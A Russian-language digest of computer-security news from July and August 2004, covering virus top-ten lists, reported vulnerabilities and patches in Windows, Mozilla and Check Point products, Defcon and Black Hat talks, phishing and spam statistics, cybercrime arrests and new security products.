«Лаборатория Касперского» опубликовала обзор вирусной активности за июль. Десятка наиболее распространенных вредоносных программ выглядит так: I-Worm.Zafi.b, I-Worm.NetSky.aa, I-Worm.NetSky.b, I-Worm.NetSky.q, I-Worm.Bagle.z, I-Worm.NetSky.t, I-Worm.NetSky.y, I-Worm.NetSky.d, I-Worm.LovGate.w, (new) I-Worm.Bagle.gen. Специалистами антивирусных компаний уже давно подмечено, что существуют несколько месяцев года, когда активность вирусописателей минимальна. Это июнь-июль и декабрь. Июль 2004 года, в целом, еще раз доказал эту закономерность и незначительно отличается от июня. Первая пятерка «вирусной десятки» полностью повторяет предыдущую. Новичок в данном рейтинге - Bagle.gen - семейство червей Bagle, размножающихся в виде файлов-архивов, защищенных паролем. Одновременно, после длительного перерыва, появилось и несколько новых вариантов червей данного семейства. В целом, итоги июля таковы: Всего было зафиксировано более 1000 различных вредоносных программ (что почти в три раза больше, чем в июне) всех видов и классов. В первой десятке появилася 1 новая вредоносная программа: I-Worm.Bagle.gen.
viruslist.ru

3/08/2004 19:11 Sophos: десятка самых распространенных вирусов июля 2004 года.
Sophos опубликовал отчет демонстрирующий десятку самых распространенных вирусов Июля 2004 года. Отчет показывает, что вирус-червь Zafi продолжает доминировать в "вирусном рейтинге". Количество обнаруженных новых вирусов также возросло. Sophos идентифицировал всего 1157 названий новых вирусов за этот месяц - это самое большое число с декабря 2001 года. Итак "вирусная десятка" выглядит следующим образом: W32/Zafi-B, W32/Netsky-P, W32/Netsky-D, W32/Bagle-AA, W32/Netsky-Z, W32/Netsky-B, W32/Netsky-Q, (New) W32/MyDoom-O, W32/Mimail-C, W32/Bagle-Zip. Червь Zafi, который появился сразу на нескольких языках, скорее всего не исчезнет в скором времени, считает аналитик компании Sophos Carole Theriault, слишком много его копий распространено сейчас в интернете. MyDoom-O, впервые обнаруженный 26 числа, также получил очень широкое распространение. Потребовалось всего несколько дней, чтобы он попал в десятку "лидеров" вирусной активности. Всего за этот месяц Sophos обнаружил и выпустил лечение против 1157 различных вирусов. также Sophos сообщает, что около 9% электронных писем в этом месяце содержали вирусы.
sophos.com

3/08/2004 19:03 DoS против Windows XP/Windows 2003
об одной интересной уязвимости Windows XP/2003 сообщает security.nnov.ru. Уязвимость типа DoS подтверждена в Windows XP и Windows 2003 Server. Она возникает, если в момент отображения окна логона нажимать много раз (а вернее зажать на какое-то время) клавиши "Win" и "U". В некоторых случаях это приводит к зависанию системы. Если доступен удаленный десктоп (remote desktop) то уязвимость работает удаленно. Последовательность клавиш Win+U запускает Windows utility manager. При запуске программа проверяет запущена ли еще одна копия, и если да, то завершает работу. Однако при зажатых клавишах запуск ее происходит настолько быстро, что лишние экземпляры программы не успевают завершаться, что приводит к исчерпанию памяти и к зависанию системы. Отмечается, что уязвимость проявляется на более медленных компьютерах. На более мощных или на компьютерах с большим объемом памяти уязвимость не проявляется. Также, по-видимому, уязвимость не присутствует в Windows XP SP2.
security.nnov.ru

3/08/2004 19:00 Компьютерная преступность: изменения в Уголовном кодексе Украины
Центр исследования компьютерной преступности (crime-research.ru) опубликовал комментарии к закону «О внесении изменений в Уголовный кодекс Украины по поводу ответственности за незаконное вмешательство в работу сетей электросвязи» от 05.06.2003г. и изменениям и дополнениям в раздел XVI УК Украины. В материале разбираются и анализируются аспекты новой редакции законов.
crime-research.ru

3/08/2004 18:59 Очередная уязвимость в Mozilla / Netscape
Секьюрити компания Secunia опубликовала сообщение об обнаруженной уязвимости в броузерах Mozilla и Netscape. Об уязвимости сообщил zen-parse. Уязвимость подтверждена в Mozilla 0.x, Mozilla 1.0 - Mozilla 1.6 и Netscape 7.x. Предыдущие версии Netscape также могут быть уязвимы. Mozilla 1.7.1 не уязвима. Уязвимость вызникает из-за переполнения целого (integer overflow) в конструкторе объекта SOAPParameter. Уязвимость может быть задействована с веб страницЫ, содержащей специально сформированный javascript. В качестве решения проблемы рекомендуется отключить javascript.
Original Advisory: idefense.com, secunia.com

3/08/2004 18:58 Американские хакеры сыграют в «Capture the flag»
В течение трех дней в грядущем феврале американские хакеры планируют провести одну из самых массовых атак в интернете, сообщает сайт News.com. Целями будут не корпоративные сети и серверы, а специально подстроенные мишени для своеобразного варианта игры «Capture the flag». Члены группы Ghetto Hackers из Сиэттла уже в течение трех лет проводят мини-варианты этого шоу, когда 8 команд взламывают машины друг друга в условиях закрытой сети. В будущем году они планируют впервые провести подобное соревнование в глобальном масштабе. На данный момент через веб-сайт группы начато составление списка команд-участников на территории Соединенных Штатов. Для полигона Ghetto Hackers планируют использовать специальную VPN.
viruslist.ru

3/08/2004 18:57 Служба DNS может стать оружием хакеров
На проходившей в Лас-Вегасе конференции Defcon 2004 был прочитан доклад о том, как служба DNS может быть использована для передачи информации в обход систем защиты. Ден Камински, известный специалист по сетевой безопасности и автор нескольких книг по этой тематике, рассказал, что особым образом сформировав DNS-запрос, можно переслать данные из защищенной сети. Дело в том, что если локальный DNS-сервер не находит соответствующей записи в своей базе данных, то он передает запрос дальше, пока не будет достигнут сервер, хранящий нужную информацию. Поскольку запросы DNS пропускаются большинством систем защиты без проверки, этот путь может быть применен для для отправки любых данных.
compulenta.ru

2/08/2004 19:23 Хакеры тоже любят Google
Оказывается, самая популярная в мире поисковая машина служит одним из удобнейших инструментов для хакеров. Способность Google запоминать содержимое интернет-сайтов можно использовать для выявления наиболее слабо защищенных из них. Об этом сообщил эксперт по безопасности из компании Computer Security Лонни Лонг участникам конференции Black Hat Security Briefings в Лас-Вегасе. Хотя метод не нов, умелый поиск выявляет так много сайтов с уязвимостями, что даже видавшие виды специалисты смеялись во время демонстрации. Например, поиск по именам страниц сервера по умолчанию позволяет легко находить уязвимые серверы. Можно найти и приложения, оставленные в режимах защиты по умолчанию, если искать по страницам ошибок, генерируемым программным обеспечением. «Это первый шаг при определении целей для атаки», — сказал Лонг. Например, простой поиск страницы регистрации веб-сервера Microsoft Internet Information Server выдал 11300 сайтов в интернете, у которых эта страница общедоступна. Так же легко собрать информацию о логинах в плохо сконфигурированных базах данных. Исследование глубинных возможностей поисковой машины Google дает представление о том, как легальное программное обеспечение может помочь злоумышленникам в онлайне.
zdnet.ru

2/08/2004 19:17 Panda Software: Десятка самых распространенных вирусов июля
Panda Software опубликовала десятку самых распространенных вирусов июля. Июль оказался не самым тихим периодом в сфере компьютерных вирусов. В прошедшем месяце пользователям пришлось столкнуться с такими новыми вирусами, как Bagle.AH и Mydoom.N. Тем не менее, ни один из новых вирусов не сумел обойти Downloader.GK, который в очередной раз возглавляет список вирусов. Этот вредоносный код стал причиной почти 16 процентов случаев заражения. Второе и третье места занимают два троянца, которые также присутствовали в июньской десятке. Briss.A и StartPage.FH фигурируют в 8.85 и 8.68 процентах случаев заражения компьютеров пользователей. Итак, в первую десятку вошли: Trj/Downloader.GK; Trj/Briss.A; Trj/StartPage.FH; W32/Netsky.P.worm; W32/Sasser.ftp; W32/Gaobot.gen.worm; Trj/Downloader.JH; Trj/Qhost.gen; Trj/Downloader.HC; W32/Bagle.AH.worm.
viruslab.ru

2/08/2004 19:13 Компьютерная преступность - статистика ФБР за 2004 год
crime-research.ru разместила отчет по компьютерной преступности, опубликованный ФБР за 2004 год. Отчет показывает: количество «успешных» атак на компьютерные системы, начиная с 2001 года снижается. В этом году процент опрошенных, ответивших, что их компании пострадали от несанкционированного доступа к компьютерным системам составил 53%, что является самым низким показателем, начиная с 1999. Общие потери в 2004 году среди опрошенных 269 респондентов составили 141 496 560 $, что меньше чем 201 797 340 $ в 2003. Самым «дорогим» видом компьютерных преступлений остаются DoS атаки – $26 064 050. Второе место занимает кража корпоративной информации (промышленный шпионаж) - $11 460 000, мошенничество с финансовыми ресурсами занимает 5 место – $7 670 500, на седьмом месте – несанкционированный доступ - $4 278 205, проникновение в систему – на 11 месте – $901 500.
crime-research.ru

2/08/2004 19:09 Растет активность интернет-мошенников
Аналитики компании VeriSign отмечают на протяжении последних 12 месяцев резкое увеличение активности интернет-мошенников, так называемого "фишинга" - получения конфиденциальной информации пользователей посредством использования подставных сайтов в Интернете. Большая часть мошеннических сайтов располагалась на территории США, и только 37% - за пределами этой страны, преимущественно в Корее, Китае, Польше, Бразилии, Тайване, Сингапуре, Австралии и Индонезии. В 93% подобных рассылок в графе "отправитель письма" значились поддельные адреса электронной почты, в 5% случаев не было предпринято никакой маскировки, в 2% - рассылка производилась с адресов, до степени смешения сходных с оригинальными адресами корпораций. Отслеживая IP-адреса, специалисты VeriSign представили своеобразный "черный список" стран, наиболее благоприятствующих злоумышленникам. Чаще всего мошеннические транзакции осуществляются с IP-адресами относящимися к Камеруну - 100% операций с адресами, зарегистрированными для этой страны, считаются рискованными. Далее идут Нигерия (96% вероятность мошенничества), Индонезия (93%) и Словения (92%).
crime-research.ru

2/08/2004 19:08 Новые модификации червей Lovegate и Bugbros
Антивирусная компания Symantec сообщает об обнаружении двух новых модификаций сетевых червей. Первый из них, червь Lovgate, появился теперь в списках вирусов под маркировкой "AK". Отличают его от предыдущей версии новые способы маскировки и поиска почтовых адресов на жестком диске зараженного компьютера. Вирус теперь приходит в письмах с другими темами, содержанием и именами вложенных файлов. Второй червь - Bugbros.C. Он приходит в письмах, содержащих текст о некой бесплатной "Microsoft Windows Panel", а после запуска вложения создает в папке Windows исполняемый файл Twunk_64.exe и продолжает свое распостранение по адресам, найденным в адресной книге Outlook.
compulenta.ru

2/08/2004 19:06 Открылась хакерская конференция Defcon 2004
30 июля в Лас-Вегасе состоялось открытие крупнейший международной хакерской конференции Defcon. Двенадцатая по счету встреча известнейших хакеров и специалистов по безопасности, проходящая в Лас-Вегасе займет два дня и соберет около 5000 специалистов и просто интересующихся со всего мира. Регистрация для посещения конференции будет стоить участникам 80 долларов США. Что интересно, эта сумма принимается исключительно наличными - с кредитными картами организаторы решили не связываться. За три дня будет проведено большое количество докладов и совещаний. Наряду с такими интересными докладам, как квантовый взлом, расшифровка сообщений на скульптуре возле здания ЦРУ, стеганография или обсуждение полезности открытых исходников для безопасности, на конференции будут представлены и чисто технические сообщения - обсуждение защищенности смарт-карт, подробное рассмотрение протокола IP шестой версии или рассмотрение возможностей взлома систем интернет-телефонии. Главной же темой должно стать обсуждение реальных и потенциальных уязвимостей систем электронного голосования.
compulenta.ru

2/08/2004 19:05 Doom 3 украден и выложен в Сеть
internet.ru сообщает что, долгожданный 3d-шутер Doom 3 украден всего за несколько дней до официального релиза и, как пишет The Inquirer, уже появилась на ряде узлов некоторых «элитных» p2p-сетей, вроде DirectConnect. Если верить данным BBC News, игра уже разошлась в виде нескольких тысяч копий, что может не самым лучшим образом отразиться на финансовых показателей id Software, потратившей на создание этого римейка четыре года и около полутора десятков миллионов долларов. Поводом для беспокойства руководства id Software может стать тот факт, что некоторые критики, поигравшие с украденной копией, уже жалеют о потраченном времени: спецэффекты действительно потрясают своим реализмом обладателей мощных компьютеров, но собственно «играбельность» игры пока остается под большим вопросом.
internet.ru

2/08/2004 19:04 SCO хочет вернуть себе Unix System Labs
The SCO Group подала заявку на регистрацию товарного знака Unix System Labs. Такое название до 1993 года носило дочернее предприятие AT&T, владевшее правами на торговую марку Unix и исходные тексты Unix System V. В 1993 году Unix System Labs была приобретена компанией Novell, а в 2000-м та продала часть ее активов SCO и передала права на товарный знак Unix консорциуму The Open Group. В самой SCO в торговой марке Unix System Labs видят ценное приобретение, но пока не определились, что будут с ним делать. «Возможно, мы переименуем компанию, а возможно, воспользуемся для каких-то других целей», — сообщил представитель SCO. Против передачи ей торговой марки Unix System Labs протестуют в Open Group, заявляя, что своим обращением в Бюро патентов и товарных знаков компания нарушает лицензионный договор между нею и консорциумом на пользование торговой маркой Unix. У Open Group есть и другие претензии к компании. «В SCO утверждают, например, что ей принадлежат права на Unix. Это не так», — заявляет представитель консорциума.
nixp.ru

2/08/2004 19:03 Хакеры научились подделывать интерфейс Mozilla
Недавно в браузерах Mozilla и Mozilla Firefox была обнаружена уязвимость, позволяющая сайту, содержащему вредоносный код, фальсифицировать пользовательский интерфейс. Поскольку интерфейс браузеров Mozilla построен с использованием языка XUL (XML-язык интерфейсов), а XUL-файлы, пришедшие из интернета дополнительно не проверяются на содержание элементов, перекрывающих стандартный интерфейс, эта ошибка и была использована хакерами для написания скрипта, заменяющего интерфейс браузера.
nixp.ru

31/07/2004 23:12 Microsoft латает дыры в Internet Explorer
Microsoft выпустила обновление для Internet Explorer версий 5.01, 5.5 и 6. Обновление закрывает три обнаруженных ранее уязвимости, позволяющих провести DoS (Denial of Service) атаку или скомпроментировать систему пользователя. Первая уязвимость позволяла обходить зональные ограничения в Internet Explorer. Вторая ошибка возникала из-за беззнакового целого при обработке BMP файлов и позволяла выполнить произвольный код. Хотя, эта уязвимость была уже исправлена в предыдущем сервис-паке для Internet Explorer. И, наконец, третья ошибка - ошибка при проверке границ буфера при обработке GIF изображений, также позволяющая выполнить произвольный код на уязвимой системе.
Microsoft Advisory, Secunia Advisory

31/07/2004 23:11 Должен ли Ваш провайдер блокировать доступ к сайтам с детским порно?
Такой опрос проводит среди пользователей интернет Центр исследования компьютерной преступности (www.crime-research.ru). Напомним, что недавно практически все средства массовой информации сообщили о разоблачении украинского модельного агентства, занимающегося изготовлением и распространением детской порнографии. Фирма, работающая в Киеве, имела филиалы в Харькове и Симферополе. По сообщениям представителей правоохранительных органов, в ходе обысков изъяты электронные носители с непристойными изображениями сотен (!) несовершеннолетних детей. Существующая на сегодняшний день статистика свидетельствует о широкой распространенности в мире данного вида преступления. По разным источникам индустрия детского порно составляет 2-3 миллиарда долларов в год. Законы разных стран предполагают ответственность за изготовление, распространение и даже пользование детской порнографией. В США, например, за распространение детской порнографии в сети ответственность несет провайдер, в Канаде и ряде европейских стран отслеживают и наказывают потребителей - наказать могут как за поиск соответствующих сайтов, так и за то, что хранишь детскую «клубничку» в своем компьютере. Наказание за изготовление и распространение детского порно в разных странах Запада и Востока – от 10 лет лишения свободы до пожизненного заключения. Голосование на crime-research.ru призвано выяснить мнение интернет аудитории по данному вопросу. Пока большинство респондентов дали ответ "Однозначно да".
crime-research.ru

31/07/2004 23:11 Рунет поражен опасным троянцем
Украинский Антивирусный Центр (http://www.unasoft.com.ua/), разработчик комплексных систем антивирусной защиты, сообщает об эпидемии опасной троянской программы Backdoor.Ubriel.b в Рунете. В связи с данным инцидентом специалистами Украинского Антивирусного Центра была создана специальная бесплатная утилита для детектирования и обезвреживания данной троянской программы. Всем пользователям ПК настоятельно рекомендуется скачать утилиту и проверить компьютер на наличие данной вредоносной программы. Вредоносные функции Backdoor.Ubriel.b: троянец ворует информацию об электронных кошельках WebMoney, профили Miranda, настройки почтовых клиентов. Кроме того, троянец содержит кейлоггер и Backdoor-компоненту, которая открывает порт 777 и ждёт удалённых команд.
webplanet.ru

31/07/2004 23:09 В Днепропетровске пресечены преступные действия хакеров
Сотрудники Управления Службы безопасности Украины в Днепропетровской области задержали двух злоумышленников, намеревавшихся похитить значительную сумму, осуществив ряд незаконных финансовых операций с использованием сети Интернет, сообщили «УНІАН» в пресс-службе СБУ. При этом мошенники воспользовались конфиденциальной банковской информацией, к которой имел доступ один из них, будучи сотрудником финансового учреждения. По данному факту возбуждено уголовное дело. Двое других жителей Днепропетровска, используя специальное программное обеспечение и аппаратный комплекс, получили доступ к конфиденциальной компьютерной информации провайдерской компании, прикрываясь которой, анонимно осуществляли хакерские атаки в отношении одного из банков. В результате проведения оперативно-розыскных мероприятий сотрудники спецслужбы установили злоумышленников. По факту хищения и присвоения компьютерной информации возбуждено уголовное дело по ст. 362 Уголовного кодекса Украины.
crime-research.ru

30/07/2004 21:52 78% пользователей Linux никогда не испытывали хакерских атак
Inquirer сообщает о том, что Evans Data опубликовала новый отчет, озаглавив его "Summer 2004 Linux Development Survey". Из результатов этого отчета свидетельствует, что 92% респондентов сообщили, что их Linux системы никогда не были заражены вирусами. Кроме того, 78% Linux- разработчиков утверждают, что их система никогда не была взломана. Менее семи процентов сообщили что их системы были взломаны три и более раз. Николас Петрелей (Nicholas Petreley), Linux аналитик компании Evans Data thinks, сказал, что это не удивительно, что Linux системы по результатам отчета оказались защищенными в большей степени, чем Windows. Он сказал: "Чем больше глаз смотрит на код, тем меньше шансов что-нибудь проглядеть, поэтому ОС естественно становится более защищенной."
theinquirer.net

30/07/2004 21:51 Новая технология от Panda Software: TruPrevent
Panda Software выпустила технологии TruPrevent – наиболее интеллектуальные технологии для борьбы с неизвестными вирусами и вторжениями, включив их в целую линейку продуктов, разработанных для домашних пользователей, бизнеса и профессионалов: TruPrevent Personal, Titanium Antivirus 2004, Platinum Internet Security. В ближайшие месяцы Panda Software выпустит ряд продуктов с технологиями TruPrevent, которые обеспечат защиту малого бизнеса, крупных компаний от неизвестных вирусов и вторжений. В настоящее время бета версии корпоративных технологий TruPrevent можно загрузить по адресу: http://www.pandasoftware.com/beta.
viruslab.ru

30/07/2004 21:51 Большая часть вирусов этого года написана одним человеком
Как следует из полугодового отчета о вирусных инфекциях, опубликованного в среду компанией Sophos, ответственность за 70% всех заражений компьютерными вирусами в 2004 году несет 18-летний Свен Яшан (Sven Jaschan), признавший себя автором вирусов Netsky и Sasser. В мае Яшан был арестован немецкой полицией, которая утверждает, что он признал свое авторство в написании червей Netsky и Sasser, и эксперты Microsoft это подтвердили. (Арестовать тинэйджера помогла программа наград Microsoft за поимку вирмейкеров.) За пять месяцев до ареста Яшана вышло, по крайней мере, 25 вариантов Netsky и один сетевой червь Sasser, сканирующий порты.
zdnet.ru

30/07/2004 21:50 Спам в Рунете: I полугодие 2004 года
«Вебпланета» представляет краткое резюме аналитического отчета, подготовленного специалистами компании «Ашманов и Партнеры». К концу I полугодия 2004 года объем спама достиг значения 70–80% от общего объема почтового трафика Рунета. Хотя это меньше значения, которое прогнозировали в конце 2003 года эксперты, сохраняется тенденция к увеличению доли спама в почтовом трафике: к началу лета 2004 года прирост составил 10–15% от общего объема почты. Тематики коммерческих рассылок меняются в зависимости от сезона, покупательской способности и многих других факторов. Лидерами спамерских тематик Рунета являются тематики «Для взрослых» (25%), «Медицина и Здоровый образ жизни» (15%), «Образование» (до 13%). Далее следуют тематики «Личные финансы» (6%), «Услуги по электронной рекламе» (4,4%) и «Отдых и путешествия» (2,8%). Суммарная доля этих тематик составляет более 50% всего потока спама. Следует отметить, что тематики «Отдых и путешествия» и «Образование» представлены преимущественно русскоязычными сообщениями.
webplanet.ru

30/07/2004 21:50 Правительство взялось за информацию всерьез
Целых два законопроекта, касающихся регулирования информации (и интернета как главного носителя информации), сегодня были анонсированы чиновниками. Первый законопроект касается информагентств и интернет-изданий. Во втором постулируется максимальная информационная открытость госорганов. В новую редакцию закона о СМИ, которую, возможно, удастся доработать до конца текущего года, будут добавлены разделы об информагентствах и интернет-изданиях. Об этом в интервью «Итар-Тасс» сообщил в четверг Дмитрий Мезенцев — вице-спикер Совета Федерации, курирующий информационную политику, сообщает «Прайм-Тасс». Примерно в это же время МЭРТ внесло в правительство РФ проект закона «Об обеспечении доступа граждан и организаций к информации о деятельности государственных органов и органов местного самоуправления». Этот законопроект планируется к рассмотрению на заседании правительства 5 августа, сообщили в четверг РИА «Новости» в пресс-службе министерства. Особенностью законопроекта является то, что он впервые законодательно устанавливает доступ к информации о деятельности госорганов и право граждан запрашивать эту информацию в электронном виде. Согласно новому закону, госорганы и органы местного самоуправления должны подключать свои информационные системы к интернету, открывать для неограниченного доступа свои официальные сайты, выделять адреса электронной почты для получения запросов и передачи запрашиваемой информации.
webplanet.ru

30/07/2004 21:49 Программно-аппаратный комплекс от Symantec
Корпорация Symantec выпустила свою первую серию программно-аппаратных комплексов, предназначенных для предупреждения вторжений — Symantec Network Security 7100, сообщает «Прайм-Тасс» со ссылкой на пресс-службу корпорации. Серия Symantec Network Security 7100 включает три модели: 7120, 7160 и 7161. Быстродействие моделей составляет от 50 Мбит/с до 2 Гбит/с; одно устройство может обслуживать до восьми сегментов сети. В устройствах Symantec Network Security 7100 используется новый модуль Intrusion Mitigation Unified Network Engine (IMUNE), сочетающий различные методы обнаружения, в т.ч. анализ аномалий протоколов, блокировку атак, направленных против уязвимых мест, распознавание сигнатур, выявление атак типа «отказ в обслуживании» (Denial of Service, DoS), сканирования портов и попыток обхода системы IDS. Архитектура IMUNE позволяет предотвращать распространение червей и блокировать вредоносные угрозы. Также IMUNE защищает пользователей от вторжений, вредоносного кода, атак против сетевой инфраструктуры, несанкционированного использования приложений, сканирования и опроса портов, попыток проведения DoS-атак, создания «потайных ходов», атак, вызывающих переполнение буфера, и комбинированных угроз, таких как MS Blaster и SQL Slammer. Symantec Network Security 7100 является частью семейства Symantec Intrusion Protection, которое включает решения корпоративного уровня, позволяющие предвидеть, выявлять, предупреждать и сдерживать атаки, ведущиеся извне или изнутри сети предприятия. К другим ключевым компонентами этого семейства относятся Symantec ManHunt, Symantec Host IDS и Symantec Gateway Security.
webplanet.ru

30/07/2004 21:48 Хакер из Йошкар-Олы полгода взламывал компьютеры
В неправомерном доступе к компьютерной информации обвиняется житель Йошкар-Олы. Как сообщили ИА Regnum в группе общественных связей Управления ФСБ России по Республике Марий Эл, 28 июля следственным управлением УВД г. Йошкар-Олы возбуждено уголовное дело по статье 272 Уголовного кодекса РФ. В ходе проведенных оперативно-следственных мероприятий сотрудниками УФСБ РФ по РМЭ, отдела "К" МВД РМЭ и СУ УВД г. Йошкар-Олы установлено, что злоумышленник в течение полугода взломал компьютеры полутора десятков организаций республики и использовал полученные данные и чужие коды для доступа в интернет. Сумма ущерба устанавливается.
webplanet.ru

30/07/2004 21:48 В Китае за десять дней закрыто 700 порносайтов
Китайская полиция закрыла около 700 порносайтов, на распространителей подобной продукции в интернете заведено 151 уголовное дело, по которым арестовано 224 подозреваемых. Об этом сообщил представитель министерства общественной безопасности КНР, которого цитирует агентство «Синьхуа». Таковы итоги первой декады общенациональной кампании борьбы с виртуальной порнографией, развернутой в КНР в соответствии с призывом председателя КНР Ху Цзиньтао объявить «народную войну» нездоровым явлениям в интернете. На всекитайском селекторном совещании лидер потребовал «разгромить» наиболее злостные сайты, а также «сурово наказать» их операторов. При Госсовете КНР создана специальная служба мониторинга, куда каждый гражданин может обратиться с сообщением о возмутивших его фотографиях, клипах и видеоматериалах в интернете, пишет «Итар-Тасс». К настоящему времени властями получено около 22 тыс обращений пользователей всемирной сети в ее китайском варианте — Чайнанет. Всем владельцам зарегистрированных вэб-сайтов в Чайнанете предложено «немедленно прекратить распространение эротической информации и повысить самодисциплину».
webplanet.ru

30/07/2004 21:47 Жертвой новых хакеров станут магазины
Миниатюрные и относительно дешевые радиочастотные идентификаторы (RFID) все шире используются в торговле для контроля за перемещением товаров, а также их учета. Некоторые правозащитники считают, тем не менее, что использование RFID ограничивает личную неприкосновенность покупателей, поскольку дает возможность следить за ними после того, как они приобрели товар с интегрированным чипом. По мнению экспертов, в целях обеспечения защиты прав личности необходимо предоставить покупателям возможность стирать записанную в RFID-чипах информацию о сделанных ими покупках при выходе из магазина. Эту возможность обеспечили немецкие программисты Лукас Грюнвальд (Lukas Grunvald) и Борис Вольф (Boris Wolf). Написанное ими Java-приложение RFDump позволяет обнаружить наличие RFID-чипа и считать его метаданные: идентификатор, тип тэга, данные о производителе товара и т.д. При этом пользовательская область памяти чипа может быть не только отображена, но и отредактирована. Тем самым программа позволяет без труда перезаписывать RFID-чипы, меняя маркировку товаров. Программа может работать на ПК или на КПК (предлагаемая в настоящий момент бесплатная версия работает с HP iPAQ под управлением Linux). Задуманная в изначально благих целях, программа открывает невиданные перспективы перед злоумышленниками, магазинными воришками, хакерами и простыми хулиганами.
cnews.ru

30/07/2004 21:47 В Германии резко выросло число преступлений, связанных с Интернет.
В Германии резко выросло число преступлений, связанных с банковскими операциями в сети Интернет. Количество подложных электронных посланий, с помощью которых преступники пытаются выведать данные клиентов, только в марте 2004 года достигло 200 тысяч, в то время как за весь прошлый год их было только 300. Как сообщает газета "Хандельблатт", клиент получает по электронной почте письмо с просьбой обращаться на новый Интернет-сайт банка. На этой фальшивой странице его просят оставить все данные личного счета. Украденные сведения мошенники используют в целях проведения операций по переводу средств, естественно, на свои счета, пишет газета. В то же время издание не уточняет, сколько людей стали жертвами "электронного мошенничества".
rian.ru

30/07/2004 21:46 Убытки украинского бизнеса от интернет-вирусов за полгода составили €45 млн.
Финансовые убытки, понесенные украинскими компаниями от вирусных атак в интернете в первом полугодии 2004 года составили около €45 млн., что на 30% больше, по сравнению с аналогичным периодом минувшего года. Об этом корреспонденту CNews.ru сообщил маркетинг-директор компании Украинский Антивирусный Центр (УАЦ) Евгений Шевченко. По мнению специалистов УАЦ, наибольший ущерб в расчете на один ПК приходится на средний бизнес, где имеется большое количество ПК, но при этом затраты на техническую защиту информации минимальны. Большинство крупных украинских компаний после прошлогодних эпидемий стало уделять гораздо больше внимания антивирусной защите, благодаря чему смогло минимизировать свои убытки в текущем году. Г-н Шевченко отметил также, что в первом полугодии значительно возросло количество вирусных инцидентов, связанных с домашними пользователями Сети: к примеру, за этот период более 90% пользователей доступа в интернет провайдера ОАО “Укртелеком” подвергались действию вирусов. Основной причиной массовых вирусных эпидемий в этом сегменте является практически полное отсутствие средств антивирусной защиты и межсетевых экранов.
cnews.ru

30/07/2004 21:45 Microsoft готовит новый экстренный патч для Internet Explorer
Компания Microsoft готовится выпустить новый внеочередной патч к своему браузеру Internet Explorer. По информации издания eWeek, новая заплатка будет предназначена для защиты браузера от модифицированных вариантов червя Download.Ject, эпидемия которого произошла в конце июня. Напомним, что атака Download.Ject осуществляется в две стадии. Сначала хакеры используют дыру в пакете Internet Information Server и размещают на работающих под его управлением сайтах вредоносный скрипт, который использует дыру в Internet Explorer для загрузки на компьютер троянской программы. С ее помощью злоумышленники могут использовать пораженную машину по своему усмотрению. Microsoft весьма оперативно отреагировала на атаку, выпустив внеочередной патч для своего браузера, а затем и утилиту для удаления червя с пораженных компьютеров. Однако ряд экспертов по безопасности обнаружили, что заплатка от Microsoft не устраняет всех проблем, и что хакеры по-прежнему могут атаковать Internet Explorer через имеющуюся в браузере брешь, несколько изменив подход к делу. Полностью ликвидировать прореху и призван новый патч. В сообщении eWeek утверждается, что заплатка увидит свет уже на следующей неделе.
compulenta.ru

30/07/2004 21:44 Разработчики Mozilla нашли ошибки в коде Netscape
В браузере Mozilla недавно были обнаружены две уязвимости, связанные с работой механизма определения подлинности сайтов. В коде, отвечающем за проверку сертификации, были найдены ошибки, унаследованные еще от браузера Netscape, в котором они таились еще с версии 4.0. Так что можно сказать, этим недоработкам исполнилось уже шесть-семь лет. Разработчики Mozilla сообщают, что эти ошибки не критичны, но факт их обнаружения в коде, унаследованном от Netscape, был достаточно неожиданным и должен послужить поводом для обращения дополнительного внимания на безопасность, в том числе и в старом коде. Как оказалось, проверка временем - не лучшая проверка. Заплатки или новые версии браузеров на основе Mozilla будут выпущены в скором времени.
compulenta.ru

30/07/2004 21:42 За последние шесть месяцев появились около 4700 новых вирусов
Антивирусная компания Sophos в своем отчете говорит о том, что за последние шесть месяцев появилось 4677 новых вирусов, что на 21 процент превышает количество вредоносных программ, созданных за то же время в прошлом году. Самым распостраненным за прошедшие полгода вирусом оказался Sasser, за ним следуют Netsky (модификации P, B и D). Sophos отмечает, что наибольшую распостраненность получают вирусы, использующие бреши в защите операционных систем, что наглядно демонстрируют прошлогодний успех Blaster и нынешенее лидерство Sasser.
compulenta.ru

29/07/2004 13:20 Конец интернет-библиотекам?
С 28 июля вступает в действие Закон об авторских и смежных правах, который может поставить под вопрос существование бесплатных электронных библиотек в интернете. Так, в 19 статье нового закона четко говорится, что "экземпляры произведений, выраженных в цифровой форме могут предоставляться во временное безвозмездное пользование только в помещениях библиотек при условии исключения возможности создать копии этих произведений в цифровой форме".
lenta.ru

29/07/2004 13:20 Уязвимость в Check Point VPN-1
Secunia сообщает о том, что ISS X-Force обнаружила уязвимость в различных продуктах линейки Check Point VPN-1, которая может быть использована злоумышленниками для атаки на уязвимую систему. Уязвимы следующие продукты: Check Point FireWall-1 GX 2.x; Provider-1; SSL Network Extender; VPN-1 SecureClient; VPN-1 SecuRemote; VPN-1/Firewall-1 NG; VPN-1/FireWall-1 NG с Application Intelligence (AI) и VPN-1/FireWall-1 VSX NG. Уязвимость возникает из-за ошибки при проверке границ в библиотеке ASN.1 в процессе установления зашифрованного соединения. Уязвимость приводит к переполнению кучи и возникает при установлении VPN соединения и посылки специального пакета. Успешное использование уязвимости позволяет обойти аутентификацию и выполнить произвольный код на машине-жертве. Патч, закрывающий уязвимость, выпущен.
Оригинальные сообщения: Check Point, ISS, Secunia

29/07/2004 13:19 Наблюдается рост интереса мошенников к интернет-пейджерам
Эксперты по интернет-безопасности предупредили о многократном росте объемов спама, рассылаемого на интернет-пейджеры с предложением зайти на определённую страницу и обновить личные данные. Кроме того, в программах, поддерживающих спонсорские ссылки, стали появляться URL подставных сайтов, специально созданных "фишерами". Подобная схема используются и несколькими интернет-червями и вирусами, такими как, например, Bakosto. В связи с тем, что системы интернет-пейджинга в последнее время начали стремительно расти, мошенники развили активную деятельность не только по электронной почте, но и в сетях обмена мгновенными сообщениями. Эксперты по безопасности призывают внимательно относиться и лишний раз проверять пришедшие сообщения.
compulenta.ru

29/07/2004 13:18 Kaspersky Security для PDA 5.0 уже в продаже
«Лаборатория Касперского» объявила о начале продаж полнофункциональной коммерческой версии нового средства обеспечения безопасности для наладонных компьютеров — Kaspersky Security для PDA 5.0. Kaspersky Security для PDA — это комплекс средств защиты данных, хранимых на карманном переносном компьютере (КПК). Продукт обеспечивает антивирусную защиту КПК различных типов, работающих под управлением PocketPC и Palm OS. Антивирусная составляющая системы защиты КПК реализована на базе «Антивируса Касперского». Важным свойством пакета программ Kaspersky Security для PDA является функция шифрования данных, защищающая карманный компьютер от несанкционированного доступа к расположенной на нем информации.
